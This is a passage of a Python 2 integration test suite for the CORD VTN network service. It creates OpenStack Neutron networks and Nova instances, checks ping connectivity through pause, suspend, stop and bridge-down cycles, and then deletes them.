def test_cordvtn_creating_mgmt_and_private_network_with_two_instances_and_validate_connectivity_from_host_machine_or_compute_node_and_check_connectivity_to_other_instance(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under management network
3. Do GET Rest API and validate creation of network
4. Create new nova instance under management network
5. Validate new nova instance is created on nova service
6. Verify ping is getting successful from compute node to nova instance which is created in step 4.
"""
test_two_networks_name = ['vtn_test_34_net_management','vtn_test_34_net_private']
test_two_sub_networks_cidr = [["management","172.27.0.0/24", "172.27.0.20", "172.27.0.21"], ["private","10.160.160.192/26",'10.160.160.193']]
test_management_type = ["management_local", 'private']
first_instance_vm_name = 'vtn_test_34_nova_first_instance_management_net'
second_instance_vm_name = 'vtn_test_34_nova_second_instance_management_net'
# image_name = "vsg-1.1"
image_name = "trusty-server-multi-nic"
flavor_id = 'm1.small'
for test_net_name in test_two_networks_name:
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**neutron_creds)
#for test_net_name,test_sub_net_cidr in test_two_networks_name test_two_sub_networks_cidr:
for i in range(0,2):
networks = neutron.list_networks(name=test_two_networks_name[i])
network_id = self.get_key_value(d=networks, key = 'id')
sub_result = self.neutron_subnet_creation_and_validation(test_two_networks_name[i],test_two_sub_networks_cidr[i])
assert_equal(sub_result[0], True)
net_type_post = self.sub_network_type_post_to_onos(test_two_networks_name[i], test_management_type[i])
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
print nova.security_groups.list()
new_first_instance_details = self.nova_instance_creation_and_validation(test_two_networks_name,nova,first_instance_vm_name,image_name,flavor_id)
new_second_instance_details = self.nova_instance_creation_and_validation(test_two_networks_name,nova,second_instance_vm_name,image_name,flavor_id)
time.sleep(60)
assert_equal(new_first_instance_details.status, 'ACTIVE')
assert_equal(new_second_instance_details.status, 'ACTIVE')
compute_details = self.get_compute_nodes()
first_instance_address = new_first_instance_details.addresses
second_instance_address = new_second_instance_details.addresses
print 'Nova first instance management ip = %s and private ip %s'%(first_instance_address[test_two_networks_name[0]][0]['addr'],first_instance_address[test_two_networks_name[1]][0]['addr'])
print 'Nova second instance management ip = %s and private ip %s'%(second_instance_address[test_two_networks_name[0]][0]['addr'],second_instance_address[test_two_networks_name[1]][0]['addr'])
secgroup = nova.security_groups.find(name="default")
# nova.security_group_rules.create(secgroup.id,ip_protocol="tcp",
#from_port="22",
#to_port="22",
# cidr="0.0.0.0/0",)
# nova.security_group_rules.create(secgroup.id,
# ip_protocol="icmp",
# from_port=-1,
# cidr="0.0.0.0/0",
# to_port=-1)
print nova.security_groups.list()
status_1, output = self.nova_instance_tenants_access_check(first_instance_address[test_two_networks_name[0]][0]['addr'])
status_2, output = self.nova_instance_tenants_access_check(first_instance_address[test_two_networks_name[1]][0]['addr'],source_tenants_details = second_instance_address[test_two_networks_name[0]][0]['addr'],check_type = "Ping_from_source_tenant")
self.nova_instance_deletion(nova, new_first_instance_details)
self.nova_instance_deletion(nova, new_second_instance_details)
time.sleep(3)
self.neutron_network_deletion(test_two_networks_name[0])
self.neutron_network_deletion(test_two_networks_name[1])
assert_equal(status_1, True)
assert_equal(status_2, True)
def test_cordvtn_creating_mgmt_and_private_network_with_two_instances_with_and_without_pause_validating_connectivity_from_host_machine_or_compute_node_and_validating_connectivity_to_other_instance(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under management network
3. Do GET Rest API and validate creation of network
4. Create new nova instance under management network
5. Validate new nova instance is created on nova service
6. Verify ping is getting successful from compute node to nova instance which is created in step 4.
7. Now pause one of the nova instance and check connectivity
8. Now start the same nova instance and check connectivity
"""
test_two_networks_name = ['vtn_test_35_net_management','vtn_test_35_net_private']
test_two_sub_networks_cidr = [["management","172.27.0.0/24", "172.27.0.20", "172.27.0.21"], ["private","10.160.160.192/26",'10.160.160.193']]
test_management_type = ["management_local", 'private']
first_instance_vm_name = 'vtn_test_35_nova_first_instance_management_net'
second_instance_vm_name = 'vtn_test_35_nova_second_instance_management_net'
# image_name = "vsg-1.1"
image_name = "trusty-server-multi-nic"
flavor_id = 'm1.small'
for test_net_name in test_two_networks_name:
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**neutron_creds)
#for test_net_name,test_sub_net_cidr in test_two_networks_name test_two_sub_networks_cidr:
for i in range(0,2):
networks = neutron.list_networks(name=test_two_networks_name[i])
network_id = self.get_key_value(d=networks, key = 'id')
sub_result = self.neutron_subnet_creation_and_validation(test_two_networks_name[i],test_two_sub_networks_cidr[i])
assert_equal(sub_result[0], True)
net_type_post = self.sub_network_type_post_to_onos(test_two_networks_name[i], test_management_type[i])
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
print nova.security_groups.list()
new_first_instance_details = self.nova_instance_creation_and_validation(test_two_networks_name,nova,first_instance_vm_name,image_name,flavor_id)
new_second_instance_details = self.nova_instance_creation_and_validation(test_two_networks_name,nova,second_instance_vm_name,image_name,flavor_id)
time.sleep(60)
assert_equal(new_first_instance_details.status, 'ACTIVE')
assert_equal(new_second_instance_details.status, 'ACTIVE')
compute_details = self.get_compute_nodes()
first_instance_address = new_first_instance_details.addresses
second_instance_address = new_second_instance_details.addresses
print 'Nova first instance management ip = %s and private ip %s'%(first_instance_address[test_two_networks_name[0]][0]['addr'],first_instance_address[test_two_networks_name[1]][0]['addr'])
print 'Nova second instance management ip = %s and private ip %s'%(second_instance_address[test_two_networks_name[0]][0]['addr'],second_instance_address[test_two_networks_name[1]][0]['addr'])
secgroup = nova.security_groups.find(name="default")
# nova.security_group_rules.create(secgroup.id,ip_protocol="tcp",
#from_port="22",
#to_port="22",
# cidr="0.0.0.0/0",)
# nova.security_group_rules.create(secgroup.id,
# ip_protocol="icmp",
# from_port=-1,
# cidr="0.0.0.0/0",
# to_port=-1)
print nova.security_groups.list()
status_1, output = self.nova_instance_tenants_access_check(first_instance_address[test_two_networks_name[0]][0]['addr'])
status_2, output = self.nova_instance_tenants_access_check(first_instance_address[test_two_networks_name[1]][0]['addr'],source_tenants_details = second_instance_address[test_two_networks_name[0]][0]['addr'],check_type = "Ping_from_source_tenant")
if status_1 is False or status_2 is False:
self.nova_instance_deletion(nova, new_first_instance_details)
self.nova_instance_deletion(nova, new_second_instance_details)
time.sleep(3)
self.neutron_network_deletion(test_two_networks_name[0])
self.neutron_network_deletion(test_two_networks_name[1])
assert_equal(status_1, True)
assert_equal(status_2, True)
new_first_instance_details.pause()
time.sleep(60)
status_1, output = self.nova_instance_tenants_access_check(first_instance_address[test_two_networks_name[0]][0]['addr'])
status_2, output = self.nova_instance_tenants_access_check(first_instance_address[test_two_networks_name[1]][0]['addr'],source_tenants_details = second_instance_address[test_two_networks_name[0]][0]['addr'],check_type = "Ping_from_source_tenant")
if status_1 is True or status_2 is True:
self.nova_instance_deletion(nova, new_first_instance_details)
self.nova_instance_deletion(nova, new_second_instance_details)
time.sleep(3)
self.neutron_network_deletion(test_two_networks_name[0])
self.neutron_network_deletion(test_two_networks_name[1])
assert_equal(status_1, False)
assert_equal(status_2, False)
new_first_instance_details.unpause()
print 'Nova instance is paused and unpased now checking connectivity'
time.sleep(60)
status_1, output = self.nova_instance_tenants_access_check(first_instance_address[test_two_networks_name[0]][0]['addr'])
status_2, output = self.nova_instance_tenants_access_check(first_instance_address[test_two_networks_name[1]][0]['addr'],source_tenants_details = second_instance_address[test_two_networks_name[0]][0]['addr'],check_type = "Ping_from_source_tenant")
self.nova_instance_deletion(nova, new_first_instance_details)
self.nova_instance_deletion(nova, new_second_instance_details)
time.sleep(3)
self.neutron_network_deletion(test_two_networks_name[0])
self.neutron_network_deletion(test_two_networks_name[1])
assert_equal(status_1, True)
assert_equal(status_2, True)
def test_cordvtn_creating_mgmt_and_private_network_with_two_instances_and_doing_suspend_and_resume_validating_connectivity_from_host_machine_or_compute_node_and_validating_connectivity_to_other_instance(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under management network
3. Do GET Rest API and validate creation of network
4. Create new nova instance under management network
5. Validate new nova instance is created on nova service
6. Verify ping is getting successful from compute node to nova instance which is created in step 4.
7. Now suspend one of the nova instance and check connectivity
8. Now resume the same nova instance and check connectivity
"""
test_two_networks_name = ['vtn_test_36_net_management','vtn_test_36_net_private']
test_two_sub_networks_cidr = [["management","172.27.0.0/24", "172.27.0.20", "172.27.0.21"], ["private","10.160.160.192/26",'10.160.160.193']]
test_management_type = ["management_local", 'private']
first_instance_vm_name = 'vtn_test_36_nova_first_instance_management_net'
second_instance_vm_name = 'vtn_test_36_nova_second_instance_management_net'
# image_name = "vsg-1.1"
image_name = "trusty-server-multi-nic"
flavor_id = 'm1.small'
for test_net_name in test_two_networks_name:
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**neutron_creds)
#for test_net_name,test_sub_net_cidr in test_two_networks_name test_two_sub_networks_cidr:
for i in range(0,2):
networks = neutron.list_networks(name=test_two_networks_name[i])
network_id = self.get_key_value(d=networks, key = 'id')
sub_result = self.neutron_subnet_creation_and_validation(test_two_networks_name[i],test_two_sub_networks_cidr[i])
assert_equal(sub_result[0], True)
net_type_post = self.sub_network_type_post_to_onos(test_two_networks_name[i], test_management_type[i])
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
print nova.security_groups.list()
new_first_instance_details = self.nova_instance_creation_and_validation(test_two_networks_name,nova,first_instance_vm_name,image_name,flavor_id)
new_second_instance_details = self.nova_instance_creation_and_validation(test_two_networks_name,nova,second_instance_vm_name,image_name,flavor_id)
time.sleep(60)
assert_equal(new_first_instance_details.status, 'ACTIVE')
assert_equal(new_second_instance_details.status, 'ACTIVE')
compute_details = self.get_compute_nodes()
first_instance_address = new_first_instance_details.addresses
second_instance_address = new_second_instance_details.addresses
print 'Nova first instance management ip = %s and private ip %s'%(first_instance_address[test_two_networks_name[0]][0]['addr'],first_instance_address[test_two_networks_name[1]][0]['addr'])
print 'Nova second instance management ip = %s and private ip %s'%(second_instance_address[test_two_networks_name[0]][0]['addr'],second_instance_address[test_two_networks_name[1]][0]['addr'])
secgroup = nova.security_groups.find(name="default")
# nova.security_group_rules.create(secgroup.id,ip_protocol="tcp",
#from_port="22",
#to_port="22",
# cidr="0.0.0.0/0",)
# nova.security_group_rules.create(secgroup.id,
# ip_protocol="icmp",
# from_port=-1,
# cidr="0.0.0.0/0",
# to_port=-1)
print nova.security_groups.list()
status_1, output = self.nova_instance_tenants_access_check(first_instance_address[test_two_networks_name[0]][0]['addr'])
status_2, output = self.nova_instance_tenants_access_check(first_instance_address[test_two_networks_name[0]][0]['addr'],source_tenants_details = second_instance_address[test_two_networks_name[1]][0]['addr'],check_type = "Ping_from_source_tenant")
if status_1 is False or status_2 is False:
self.nova_instance_deletion(nova, new_first_instance_details)
self.nova_instance_deletion(nova, new_second_instance_details)
time.sleep(3)
self.neutron_network_deletion(test_two_networks_name[0])
self.neutron_network_deletion(test_two_networks_name[1])
assert_equal(status_1, True)
assert_equal(status_2, True)
new_first_instance_details.suspend()
time.sleep(60)
status_1, output = self.nova_instance_tenants_access_check(first_instance_address[test_two_networks_name[0]][0]['addr'])
status_2, output = self.nova_instance_tenants_access_check(first_instance_address[test_two_networks_name[1]][0]['addr'],source_tenants_details = second_instance_address[test_two_networks_name[0]][0]['addr'],check_type = "Ping_from_source_tenant")
if status_1 is True or status_2 is True:
self.nova_instance_deletion(nova, new_first_instance_details)
self.nova_instance_deletion(nova, new_second_instance_details)
time.sleep(3)
self.neutron_network_deletion(test_two_networks_name[0])
self.neutron_network_deletion(test_two_networks_name[1])
assert_equal(status_1, False)
assert_equal(status_2, False)
new_first_instance_details.resume()
print 'Nova instance is suspend and resume now checking connectivity'
time.sleep(60)
status_1, output = self.nova_instance_tenants_access_check(first_instance_address[test_two_networks_name[0]][0]['addr'])
status_2, output = self.nova_instance_tenants_access_check(first_instance_address[test_two_networks_name[1]][0]['addr'],source_tenants_details = second_instance_address[test_two_networks_name[0]][0]['addr'],check_type = "Ping_from_source_tenant")
self.nova_instance_deletion(nova, new_first_instance_details)
self.nova_instance_deletion(nova, new_second_instance_details)
time.sleep(3)
self.neutron_network_deletion(test_two_networks_name[0])
self.neutron_network_deletion(test_two_networks_name[1])
assert_equal(status_1, True)
assert_equal(status_2, True)
def test_cordvtn_creating_mgmt_and_private_network_with_two_instances_applying_stop_and_start_validating_connectivity_from_host_machine_or_compute_node_and_validating_connectivity_to_other_instance(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under management network
3. Do GET Rest API and validate creation of network
4. Create new nova instance under management network
5. Validate new nova instance is created on nova service
6. Verify ping is getting successful from compute node to nova instance which is created in step 4.
7. Now stop one of the nova instance and check connectivity
8. Now start the same nova instance and check connectivity
"""
test_two_networks_name = ['vtn_test_37_net_management','vtn_test_37_net_private']
test_two_sub_networks_cidr = [["management","172.27.0.0/24", "172.27.0.20", "172.27.0.21"], ["private","10.160.160.192/26",'10.160.160.193']]
test_management_type = ["management_local", 'private']
first_instance_vm_name = 'vtn_test_37_nova_first_instance_management_net'
second_instance_vm_name = 'vtn_test_37_nova_second_instance_management_net'
# image_name = "vsg-1.1"
image_name = "trusty-server-multi-nic"
flavor_id = 'm1.small'
for test_net_name in test_two_networks_name:
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**neutron_creds)
#for test_net_name,test_sub_net_cidr in test_two_networks_name test_two_sub_networks_cidr:
for i in range(0,2):
networks = neutron.list_networks(name=test_two_networks_name[i])
network_id = self.get_key_value(d=networks, key = 'id')
sub_result = self.neutron_subnet_creation_and_validation(test_two_networks_name[i],test_two_sub_networks_cidr[i])
assert_equal(sub_result[0], True)
net_type_post = self.sub_network_type_post_to_onos(test_two_networks_name[i], test_management_type[i])
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
print nova.security_groups.list()
new_first_instance_details = self.nova_instance_creation_and_validation(test_two_networks_name,nova,first_instance_vm_name,image_name,flavor_id)
new_second_instance_details = self.nova_instance_creation_and_validation(test_two_networks_name,nova,second_instance_vm_name,image_name,flavor_id)
time.sleep(60)
assert_equal(new_first_instance_details.status, 'ACTIVE')
assert_equal(new_second_instance_details.status, 'ACTIVE')
compute_details = self.get_compute_nodes()
first_instance_address = new_first_instance_details.addresses
second_instance_address = new_second_instance_details.addresses
print 'Nova first instance management ip = %s and private ip %s'%(first_instance_address[test_two_networks_name[0]][0]['addr'],first_instance_address[test_two_networks_name[1]][0]['addr'])
print 'Nova second instance management ip = %s and private ip %s'%(second_instance_address[test_two_networks_name[0]][0]['addr'],second_instance_address[test_two_networks_name[1]][0]['addr'])
secgroup = nova.security_groups.find(name="default")
print nova.security_groups.list()
status_1, output = self.nova_instance_tenants_access_check(first_instance_address[test_two_networks_name[0]][0]['addr'])
status_2, output = self.nova_instance_tenants_access_check(first_instance_address[test_two_networks_name[1]][0]['addr'],source_tenants_details = second_instance_address[test_two_networks_name[0]][0]['addr'],check_type = "Ping_from_source_tenant")
if status_1 is False or status_2 is False:
self.nova_instance_deletion(nova, new_first_instance_details)
self.nova_instance_deletion(nova, new_second_instance_details)
time.sleep(3)
self.neutron_network_deletion(test_two_networks_name[0])
self.neutron_network_deletion(test_two_networks_name[1])
assert_equal(status_1, True)
assert_equal(status_2, True)
new_first_instance_details.stop()
time.sleep(60)
status_1, output = self.nova_instance_tenants_access_check(first_instance_address[test_two_networks_name[0]][0]['addr'])
status_2, output = self.nova_instance_tenants_access_check(first_instance_address[test_two_networks_name[1]][0]['addr'],source_tenants_details = second_instance_address[test_two_networks_name[0]][0]['addr'],check_type = "Ping_from_source_tenant")
if status_1 is True or status_2 is True:
self.nova_instance_deletion(nova, new_first_instance_details)
self.nova_instance_deletion(nova, new_second_instance_details)
time.sleep(3)
self.neutron_network_deletion(test_two_networks_name[0])
self.neutron_network_deletion(test_two_networks_name[1])
assert_equal(status_1, False)
assert_equal(status_2, False)
new_first_instance_details.start()
print 'Nova instance is stopped and started now checking connectivity'
time.sleep(60)
status_1, output = self.nova_instance_tenants_access_check(first_instance_address[test_two_networks_name[0]][0]['addr'])
status_2, output = self.nova_instance_tenants_access_check(first_instance_address[test_two_networks_name[1]][0]['addr'],source_tenants_details = second_instance_address[test_two_networks_name[0]][0]['addr'],check_type = "Ping_from_source_tenant")
self.nova_instance_deletion(nova, new_first_instance_details)
self.nova_instance_deletion(nova, new_second_instance_details)
time.sleep(3)
self.neutron_network_deletion(test_two_networks_name[0])
self.neutron_network_deletion(test_two_networks_name[1])
assert_equal(status_1, True)
assert_equal(status_2, True)
def test_cordvtn_creating_mgmt_and_two_private_network_with_each_instances_and_validate_connectivity_from_host_machine_or_compute_node_and_check_connectivity_to_other_instance(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under management network
3. Do GET Rest API and validate creation of network
4. Create new nova instance under management network
5. Validate new nova instance is created on nova service
6. Verify ping is getting successful from compute node to nova instance which is created in step 4.
7. Verify ping is getting successful after ssh toof one instance to other nova instance which is created in step 4.
"""
test_two_networks_name = ['vtn_test_39_net_management','vtn_test_39_netA_private','vtn_test_39_netB_private']
test_two_sub_networks_cidr = [["management","172.27.0.0/24", "172.27.0.20", "172.27.0.21"], ["private","10.160.160.192/26",'10.160.160.193'], ["private","10.160.161.192/26",'10.160.161.193']]
test_management_type = ["management_local", 'private','private']
first_instance_vm_name = 'vtn_test_39_nova_first_instance_management_netA'
second_instance_vm_name = 'vtn_test_39_nova_second_instance_management_netB'
# image_name = "vsg-1.1"
image_name = "trusty-server-multi-nic"
flavor_id = 'm1.small'
for test_net_name in test_two_networks_name:
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**neutron_creds)
#for test_net_name,test_sub_net_cidr in test_two_networks_name test_two_sub_networks_cidr:
for i in range(0,3):
networks = neutron.list_networks(name=test_two_networks_name[i])
network_id = self.get_key_value(d=networks, key = 'id')
sub_result = self.neutron_subnet_creation_and_validation(test_two_networks_name[i],test_two_sub_networks_cidr[i])
assert_equal(sub_result[0], True)
net_type_post = self.sub_network_type_post_to_onos(test_two_networks_name[i], test_management_type[i])
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
print nova.security_groups.list()
new_first_instance_details = self.nova_instance_creation_and_validation(['vtn_test_39_net_management','vtn_test_39_netA_private'],nova,first_instance_vm_name,image_name,flavor_id)
new_second_instance_details = self.nova_instance_creation_and_validation(['vtn_test_39_net_management','vtn_test_39_netB_private'],nova,second_instance_vm_name,image_name,flavor_id)
time.sleep(60)
assert_equal(new_first_instance_details.status, 'ACTIVE')
assert_equal(new_second_instance_details.status, 'ACTIVE')
compute_details = self.get_compute_nodes()
first_instance_address = new_first_instance_details.addresses
second_instance_address = new_second_instance_details.addresses
print 'Nova first instance management ip = %s and private ip %s'%(first_instance_address[test_two_networks_name[0]][0]['addr'],first_instance_address[test_two_networks_name[1]][0]['addr'])
print 'Nova second instance management ip = %s and private ip %s'%(second_instance_address[test_two_networks_name[0]][0]['addr'],second_instance_address[test_two_networks_name[2]][0]['addr'])
secgroup = nova.security_groups.find(name="default")
# nova.security_group_rules.create(secgroup.id,ip_protocol="tcp",
#from_port="22",
#to_port="22",
# cidr="0.0.0.0/0",)
# nova.security_group_rules.create(secgroup.id,
# ip_protocol="icmp",
# from_port=-1,
# cidr="0.0.0.0/0",
# to_port=-1)
print nova.security_groups.list()
status_1, output = self.nova_instance_tenants_access_check(first_instance_address[test_two_networks_name[0]][0]['addr'])
status_2, output = self.nova_instance_tenants_access_check(first_instance_address[test_two_networks_name[1]][0]['addr'],source_tenants_details = second_instance_address[test_two_networks_name[0]][0]['addr'],check_type = "Ping_from_source_tenant")
self.nova_instance_deletion(nova, new_first_instance_details)
self.nova_instance_deletion(nova, new_second_instance_details)
time.sleep(3)
self.neutron_network_deletion(test_two_networks_name[0])
self.neutron_network_deletion(test_two_networks_name[1])
assert_equal(status_1, True)
assert_equal(status_2, False)
def test_cordvtn_service_dependency_without_xos_creating_mgmt_and_two_private_network_with_each_instances_and_validate_connectivity_from_host_machine_or_compute_node_and_check_connectivity_to_other_instance(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under management network
3. Do GET Rest API and validate creation of network
4. Create new nova instance under management network
5. Validate new nova instance is created on nova service
6. Verify ping is getting successful from compute node to nova instance which is created in step 4.
7. Verify ping is getting successful after ssh toof one instance to other nova instance which is created in step 4.
"""
test_two_networks_name = ['vtn_test_40_net_management','vtn_test_40_netA_private','vtn_test_40_netB_private']
test_two_sub_networks_cidr = [["management","172.27.0.0/24", "172.27.0.20", "172.27.0.21"], ["private","10.160.160.192/26",'10.160.160.193'], ["private","10.160.161.192/26",'10.160.161.193']]
test_management_type = ["management_local", 'private','private']
first_instance_vm_name = 'vtn_test_40_nova_first_instance_management_netA'
second_instance_vm_name = 'vtn_test_40_nova_second_instance_management_netB'
# image_name = "vsg-1.1"
image_name = "trusty-server-multi-nic"
flavor_id = 'm1.small'
for test_net_name in test_two_networks_name:
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**neutron_creds)
#for test_net_name,test_sub_net_cidr in test_two_networks_name test_two_sub_networks_cidr:
for i in range(0,3):
networks = neutron.list_networks(name=test_two_networks_name[i])
network_id = self.get_key_value(d=networks, key = 'id')
sub_result = self.neutron_subnet_creation_and_validation(test_two_networks_name[i],test_two_sub_networks_cidr[i])
assert_equal(sub_result[0], True)
net_type_post = self.sub_network_type_post_to_onos(test_two_networks_name[i], test_management_type[i])
print net_type_post
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
print nova.security_groups.list()
new_first_instance_details = self.nova_instance_creation_and_validation(['vtn_test_40_net_management','vtn_test_40_netA_private'],nova,first_instance_vm_name,image_name,flavor_id)
new_second_instance_details = self.nova_instance_creation_and_validation(['vtn_test_40_net_management','vtn_test_40_netB_private'],nova,second_instance_vm_name,image_name,flavor_id)
time.sleep(60)
assert_equal(new_first_instance_details.status, 'ACTIVE')
assert_equal(new_second_instance_details.status, 'ACTIVE')
service_dependency_post = self.service_dependency_on_network_post_to_onos(test_two_networks_name[1],test_two_networks_name[2],test_management_type[1])
print service_dependency_post
compute_details = self.get_compute_nodes()
first_instance_address = new_first_instance_details.addresses
second_instance_address = new_second_instance_details.addresses
print 'Nova first instance management ip = %s and private ip %s'%(first_instance_address[test_two_networks_name[0]][0]['addr'],first_instance_address[test_two_networks_name[1]][0]['addr'])
print 'Nova second instance management ip = %s and private ip %s'%(second_instance_address[test_two_networks_name[0]][0]['addr'],second_instance_address[test_two_networks_name[2]][0]['addr'])
secgroup = nova.security_groups.find(name="default")
# nova.security_group_rules.create(secgroup.id,ip_protocol="tcp",
#from_port="22",
#to_port="22",
# cidr="0.0.0.0/0",)
# nova.security_group_rules.create(secgroup.id,
# ip_protocol="icmp",
# from_port=-1,
# cidr="0.0.0.0/0",
# to_port=-1)
print nova.security_groups.list()
status_1, output = self.nova_instance_tenants_access_check(first_instance_address[test_two_networks_name[0]][0]['addr'])
status_2, output = self.nova_instance_tenants_access_check(first_instance_address[test_two_networks_name[1]][0]['addr'],source_tenants_details = second_instance_address[test_two_networks_name[0]][0]['addr'],check_type = "Ping_from_source_tenant")
self.nova_instance_deletion(nova, new_first_instance_details)
self.nova_instance_deletion(nova, new_second_instance_details)
time.sleep(3)
self.neutron_network_deletion(test_two_networks_name[0])
self.neutron_network_deletion(test_two_networks_name[1])
assert_equal(status_1, True)
assert_equal(status_2, True)
def test_cordvtn_management_network_instance_and_validate_connectivity_from_host_machine_or_compute_node_after_br_int_bridge_is_down(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under management network
3. Do GET Rest API and validate creation of network
4. Create new nova instance under management network
5. Validate new nova instance is created on nova service
6. Verify ping is getting successful from compute node to nova instance which is created in step 4.
"""
test_net_name = 'vtn_test_41_net_management'
test_sub_net_cidr = ["management","172.27.0.0/24", "172.27.0.20", "172.27.0.21"]
test_management_type = "management_local"
instance_vm_name = 'vtn_test_41_nova_instance_management_net'
#image_name = "vsg-1.1"
image_name = "trusty-server-multi-nic"
flavor_id = 'm1.small'
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**neutron_creds)
networks = neutron.list_networks(name=test_net_name)
network_id = self.get_key_value(d=networks, key = 'id')
sub_result = self.neutron_subnet_creation_and_validation(test_net_name,test_sub_net_cidr)
assert_equal(sub_result[0], True)
net_type_post = self.sub_network_type_post_to_onos(test_net_name, test_management_type)
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
new_instance_details = self.nova_instance_creation_and_validation(test_net_name,nova,instance_vm_name,image_name,flavor_id)
assert_equal(new_instance_details.status, 'ACTIVE')
compute_details = self.get_compute_nodes()
print new_instance_details.addresses
address = new_instance_details.addresses
print 'Nova instance management ip = %s'%(address[test_net_name][0]['addr'])
time.sleep(60)
status, output = self.nova_instance_tenants_access_check(address[test_net_name][0]['addr'])
if status is False:
self.nova_instance_deletion(nova, new_instance_details)
time.sleep(5)
self.neutron_network_deletion(test_net_name)
assert_equal(status, True)
cmd = 'sudo ifconfig br-int down'
#compute_details = self.get_compute_nodes()
compute_details = '10.1.0.17'
ssh_agent = SSHTestAgent(host = compute_details)
status, output = ssh_agent.run_cmd(cmd, timeout = 5)
print output
status, output = self.nova_instance_tenants_access_check(address[test_net_name][0]['addr'])
self.nova_instance_deletion(nova, new_instance_details)
time.sleep(5)
self.neutron_network_deletion(test_net_name)
cmd = 'sudo ifconfig br-int up'
status, output = ssh_agent.run_cmd(cmd, timeout = 5)
assert_equal(status, False)
def test_cordvtn_management_network_instance_and_validate_connectivity_from_host_machine_or_compute_node_toggling_br_int_bridge(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under management network
3. Do GET Rest API and validate creation of network
4. Create new nova instance under management network
5. Validate new nova instance is created on nova service
6. Verify ping is getting successful from compute node to nova instance which is created in step 4.
"""
test_net_name = 'vtn_test_42_net_management'
test_sub_net_cidr = ["management","172.27.0.0/24", "172.27.0.20", "172.27.0.21"]
test_management_type = "management_local"
instance_vm_name = 'vtn_test_42_nova_instance_management_net'
#image_name = "vsg-1.1"
image_name = "trusty-server-multi-nic"
flavor_id = 'm1.small'
cmd = 'sudo ifconfig br-int down'
#compute_details = self.get_compute_nodes()
compute_details = '10.1.0.17'
ssh_agent = SSHTestAgent(host = compute_details)
status, output = ssh_agent.run_cmd(cmd, timeout = 5)
print output
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**neutron_creds)
networks = neutron.list_networks(name=test_net_name)
network_id = self.get_key_value(d=networks, key = 'id')
sub_result = self.neutron_subnet_creation_and_validation(test_net_name,test_sub_net_cidr)
assert_equal(sub_result[0], True)
net_type_post = self.sub_network_type_post_to_onos(test_net_name, test_management_type)
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
new_instance_details = self.nova_instance_creation_and_validation(test_net_name,nova,instance_vm_name,image_name,flavor_id)
assert_equal(new_instance_details.status, 'ACTIVE')
compute_details = self.get_compute_nodes()
print new_instance_details.addresses
address = new_instance_details.addresses
print 'Nova instance management ip = %s'%(address[test_net_name][0]['addr'])
time.sleep(60)
status, output = self.nova_instance_tenants_access_check(address[test_net_name][0]['addr'])
if status is True:
self.nova_instance_deletion(nova, new_instance_details)
time.sleep(5)
self.neutron_network_deletion(test_net_name)
assert_equal(status, False)
cmd = 'sudo ifconfig br-int up'
#compute_details = self.get_compute_nodes()
compute_details = '10.1.0.17'
ssh_agent = SSHTestAgent(host = compute_details)
status, output = ssh_agent.run_cmd(cmd, timeout = 5)
print output
status, output = self.nova_instance_tenants_access_check(address[test_net_name][0]['addr'])
self.nova_instance_deletion(nova, new_instance_details)
time.sleep(5)
self.neutron_network_deletion(test_net_name)
assert_equal(status, True)
def test_cordvtn_management_network_instance_and_validate_connectivity_from_host_machine_or_compute_node_checking_onos_flows(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under management network
3. Do GET Rest API and validate creation of network
4. Create new nova instance under management network
5. Validate new nova instance is created on nova service
6. Verify ping is getting successful from compute node to nova instance which is created in step 4.
"""
test_net_name = 'vtn_test_43_net_management'
test_sub_net_cidr = ["management","172.27.0.0/24", "172.27.0.20", "172.27.0.21"]
test_management_type = "management_local"
instance_vm_name = 'vtn_test_43_nova_instance_management_net'
#image_name = "vsg-1.1"
image_name = "trusty-server-multi-nic"
flavor_id = 'm1.small'
cmd = 'sudo ifconfig br-int down'
#compute_details = self.get_compute_nodes()
compute_details = '10.1.0.17'
ssh_agent = SSHTestAgent(host = compute_details)
status, output = ssh_agent.run_cmd(cmd, timeout = 5)
print output
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**neutron_creds)
networks = neutron.list_networks(name=test_net_name)
network_id = self.get_key_value(d=networks, key = 'id')
sub_result = self.neutron_subnet_creation_and_validation(test_net_name,test_sub_net_cidr)
assert_equal(sub_result[0], True)
net_type_post = self.sub_network_type_post_to_onos(test_net_name, test_management_type)
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
new_instance_details = self.nova_instance_creation_and_validation(test_net_name,nova,instance_vm_name,image_name,flavor_id)
